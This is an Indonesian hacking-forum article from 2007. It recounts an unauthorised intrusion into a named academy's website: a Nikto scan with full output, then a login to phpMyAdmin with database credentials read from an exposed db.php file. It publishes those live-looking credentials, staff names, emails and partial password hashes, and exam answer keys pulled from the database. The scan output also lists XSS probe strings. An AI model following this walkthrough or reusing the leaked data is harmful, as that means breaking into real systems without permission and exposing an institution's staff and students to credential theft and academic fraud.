www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 7
0 Members | 7 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2986
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 6:52 pm
Articles
By cyberlog
Published: April 25, 2007
Print    Email

Akademi Bina Sarana Informatika merupakan salah satu Akademi  terbesar di Indonesia dengan kampus yang tersebar di berbagai daerah, 

mereka menggunakan sistem online didalam segala hal untuk mempermudah sistem pendidikannya dari mulai absen dosen , cetak kartu hasil studi , sampai status pembayaran mahasiswa  dan data-data lengkap puluhan ribu mahasiswanya , semua bisa dilihat didalam web ini  .

disini penulis mecoba menganalisa sistem Online yang diterapkan pada situs www.bsi.ac.id dengan melakukan scanning server mereka menggunakan Nikto.pl

 

=============================================

Vulnerable : Db.php

Type : High Risk

Original Idea : Crew #sekuritionline@dalnet ( anonymous )

Site : http://www.bsi.ac.id

=============================================

 

Ok untuk mempersingkat waktu mari kita mulai mencoba menjelajah situs www.bsi.ac.id ini !!!!

Hal pertama yang perlu dilakukan adalah siapkan satu shell account anda , lalu loginlah kedalam shell acount anda lalu downloadlah nikto.pl pada url berikut ini http://cirt.net/nikto/nikto-current.tar.gz berikut ini adalah cara detailnya menjelajahi situs www.bsi.ac.id  :

==============

login as: root

root@bla-bla-bla.com's password:

Last login: Mon 2006

Last login: Mon 01:09:20

welcome:~# wget http://cirt.net/nikto/nikto-current.tar.gz

--01:19:06--  http://cirt.net/nikto/nikto-current.tar.gz

           => `nikto-current.tar.gz'

Resolving cirt.net... done.

Connecting to cirt.net[209.197.238.96]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 192,642 [application/x-tar]

 

100%[======================================>] 192,642      184.98K/s    ETA 00:00

 

01:19:08 (184.98 KB/s) - `nikto-current.tar.gz' saved [192642/192642]

 

 

welcome:~# tar -xvzf nikto-current.tar.gz

nikto-1.35/

nikto-1.35/config.txt

nikto-1.35/docs/

nikto-1.35/docs/CHANGES.txt

nikto-1.35/docs/LICENSE.txt

nikto-1.35/docs/nikto-1.34.man

nikto-1.35/docs/nikto_usage.html

nikto-1.35/docs/nikto_usage.txt

nikto-1.35/docs/README_plugins.txt

nikto-1.35/nikto.pl

nikto-1.35/plugins/

nikto-1.35/plugins/LW.pm

nikto-1.35/plugins/nikto_apacheusers.plugin

nikto-1.35/plugins/nikto_core.plugin

nikto-1.35/plugins/nikto_headers.plugin

nikto-1.35/plugins/nikto_httpoptions.plugin

nikto-1.35/plugins/nikto_msgs.plugin

nikto-1.35/plugins/nikto_mutate.plugin

nikto-1.35/plugins/nikto_outdated.plugin

nikto-1.35/plugins/nikto_passfiles.plugin

nikto-1.35/plugins/nikto_plugin_order.txt

nikto-1.35/plugins/nikto_realms.plugin

nikto-1.35/plugins/nikto_robots.plugin

nikto-1.35/plugins/nikto_user_enum_apache.plugin

nikto-1.35/plugins/nikto_user_enum_cgiwrap.plugin

nikto-1.35/plugins/outdated.db

nikto-1.35/plugins/realms.db

nikto-1.35/plugins/scan_database.db

nikto-1.35/plugins/server_msgs.db

nikto-1.35/plugins/servers.db

nikto-1.35/versions.txt

welcome:~# cd /root/nikto-1.35

welcome:~/nikto-1.35# ./nikto.pl -update

+ Retrieving 'realms.db'

+ Retrieving 'server_msgs.db'

+ Retrieving 'nikto_headers.plugin'

+ Retrieving 'nikto_outdated.plugin'

+ Retrieving 'servers.db'

+ Retrieving 'scan_database.db'

+ Retrieving 'nikto_core.plugin'

+ Retrieving 'outdated.db'

+ Retrieving 'CHANGES.txt'

+ www.cirt.net message: Version 2.0 is still coming... Seriously.

 

================================================

Kemudian jalankan nikto kesayangan anda

==================================================

welcome:~/nikto-1.35# ./nikto.pl -h www.bsi.ac.id

---------------------------------------------------------------------------

- Nikto 1.35/1.36     -     www.cirt.net

+ Target IP:       203.130.232.140

+ Target Hostname: www.bsi.ac.id

+ Target Port:     80

+ Start Time:      Tue Dec 19 05:54:01 2006

---------------------------------------------------------------------------

- Scan is dependent on "Server" string which can be faked, use -g to override

+ Server: Apache 3 - POWERNET

- Retrieved X-Powered-By header: PHP/4.3.9

+ PHP/4.3.9 appears to be outdated (current is at least 5.1.4)

+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).

+ /icons/ - Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. (GET)

+ /manual/images/ - Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual should be removed and directory indexing disabled. (GET)

+ / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)

+ /admin.php?en_log_id=0&action=config - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /admin.php?en_log_id=0&action=users - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /config.php - Redirects to index.php , PHP Config file may contain database IDs and passwords.

+ /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?module=My_eGallery - My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. (GET)

+ /index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;  - Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

+ /info.php - Contains PHP configuration information (GET)

+ /manual/ - Web server manual? tsk tsk. (GET)

+ /readme.txt - Default file found. (GET)

+ /\"><img%20src=\"javascript:alert(document.domain)\"> - The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

+ /admin.php - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /css - Redirects to http://www.bsi.ac.id/css/ , This might be interesting...

+ /db/ - This might be interesting... (GET)

+ /download/ - This might be interesting... (GET)

+ /img/ - This may be interesting... (GET)

+ /includes/ - This might be interesting... (GET)

+ /pages/ - This might be interesting... (GET)

+ /php/ - This might be interesting... (GET)

+ /phpmyadmin/ - This might be interesting... (GET)

+ /sql/ - This might be interesting... (GET)

+ Over 20 "OK" messages, this may be a by-product of the

            +     server answering all requests with a "200 OK" message. You should

            +     manually verify your results.

+ /db.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?base=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?IDAdmin=test - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?pymembs=admin - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?SqlQuery=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?tampon=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /modules/Search/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ Over 20 "OK" messages, this may be a by-product of the

            +     server answering all requests with a "200 OK" message. You should

            +     manually verify your results.

+ 2673 items checked - 30 item(s) found on remote host(s)

+ End Time:        Tue Dec 19 06:44:55 2006 (3054 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

welcome:~/nikto-1.35#

============================================================

nah tugas kita sekarang adalah mencoba satu persatu vulnerable yang ada di situs www.bsi.ac.id ini

============================================================

hehehe banyak banget yah vulnerablenya, ok yang pertama kita cek adalah www.bsi.ac.id/db.php

Gambar Tampilan Login dan Password database BSI




Waw !!! I don’t believe it ??? , ternyata login dan password databasenya terlihat sangat jelas

ST", "localhost"; define("USER", "1385"; define("PASS", "101101"; define("DB", "db1385n1"; ?>

Oke saatnya kita masuk ke database salah satu Akademi terbesar di Indonesia ini let`s go to the party J 

www.bsi.ac.id/phpmyadmin

user : 1385

pass : 101101

Gambar tampilan awal database BSI



waw ternyata kita juga bisa  masuk kedalamnya , bisa lihat-lihat data penting di Akademi ini ( bayangin klo orang-orang yang ga bertanggung jawab atau orang yang mao mengambil keuntungan dari kelemahan ini masuk kesana ??? ga bisa dibayangin deh betapa banyaknya data-data yang bisa dicuri )

budiprasetyo  God                http://bsi.ac.id      budi_prasetyo@bsi.ac.id       2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ]

bimosadewo  bimosadewo         www.bsi.ac.id      budi_prasetyo@indo.net.id       2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ] 

webmaster  Web Master BSI         www.bsi.ac.id      admin@bsi.ac.id               237efd9bbf866189be3a3055515xxxxx [ md5 hash ]  

webadmin  Web Administrator      www.bsi.ac.id      webmaseter@bsi.ac.id       237efd9bbf866189be3a3055515xxxxx [ md5 hash ] 

 dan ternyata ada kunci jawab ujiannya juga didalamnya :

Full      Texts    kd_ujn jml_soal nilai_soal                 knc_jwb

Edit     Delete  1021 25        4.00    DDAEDCBBACBCBABCAABBCDCAD

Edit     Delete  1022 25        4.00    DBCBBBBABADDDCABAACDCBDCD

Edit     Delete  1023 25        4.00    BBADBBDCDAACBBBCDBBBBDBBC

Edit     Delete  1024 25        4.00    DDAEDCBBACDDDCABAACDBDBBC

Edit     Delete  1025 25        4.00    DBCBCDCCCBBCBBBBCADDDCAAD

Edit     Delete  1026 25        4.00    CDDADBDDBBBCCCCCADACDCCCB

Edit     Delete  1041 30        3.33    BCBBBDAAAAABCDCABDDCCBACBBABDB

Edit     Delete  1042 30        3.33    CBCADCCCCABACCBCDCAADCCADABABB

Edit     Delete  1043 30        3.33    DDCCAACCAACACACBBCBCBACADCBABB

Edit     Delete  1044 30        3.33    BCADBDBAABAABBBDBBDADBDDCBBBAD

Edit     Delete  1045 30        3.33    DDCCAACCAAABCDCABDDCDBDDCBBBAD

Edit     Delete  1046 30        3.33    CBCADCCCCAAABBCDBBDABACADCBABB

 

Note :

-     Untuk Admin mohon diperhatikan lebih jauh tentang keamanan server and

-           Untuk saat ini bugs yang terdapat pada url www.bsi.ac.id/phpmyadmin telah

Berhasil ditutup oleh sang admin dengan tidak mengijinkan IP lain masuk , selain IP sang admin itu sendiri

-     Kami hanya melakukan penetrasi kedalam tidak merusak atau mengambil data    anda,bila ada yang mengambil atau menambahkan database kedalam server anda bukan kami yang melakukannya.

-     Sampai saat tulisan ini dibuat  file yang bernama db.php masih dapat diakses oleh khalayak umum ( untuk admin harap diperhatikan permit dari file tersebut

 
thank's to :

Allah,Swt & Nabi Muhammad SAW , My Family,

Thebig`s Family #sekuritionline@dalnet  , Jasakom Community and all Crew www.sekuritionline.com 

  

 

 

 

 



View Comments (0)